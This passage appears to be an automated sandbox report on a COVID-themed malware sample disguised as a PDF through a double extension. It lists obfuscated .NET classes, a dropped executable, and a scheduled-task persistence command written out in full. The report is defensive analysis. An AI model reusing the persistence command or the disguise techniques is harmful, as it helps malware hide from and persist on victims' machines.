                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: qvDFOnW.exe.0.dr, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: qvDFOnW.exe.0.dr, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: qvDFOnW.exe.0.dr, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: qvDFOnW.exe.0.dr, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: qvDFOnW.exe.0.dr, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.csHigh entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.csHigh entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.csHigh entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.csHigh entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
                Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.csHigh entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: \recap sars covid - 19 - agency form.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: \recap sars covid - 19 - agency form.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: \recap sars covid - 19 - agency form.pdf.exeJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: \recap sars covid - 19 - agency form.pdf.exeJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeFile created: C:\Users\user\AppData\Roaming\qvDFOnW.exeJump to dropped file

                Boot Survival:

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Uses an obfuscated file name to hide its real file extension (double extension)Show sources
                Source: Possible double extension: pdf.exeStatic PE information: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeProcess information set: NOOPENFILEERRORBOX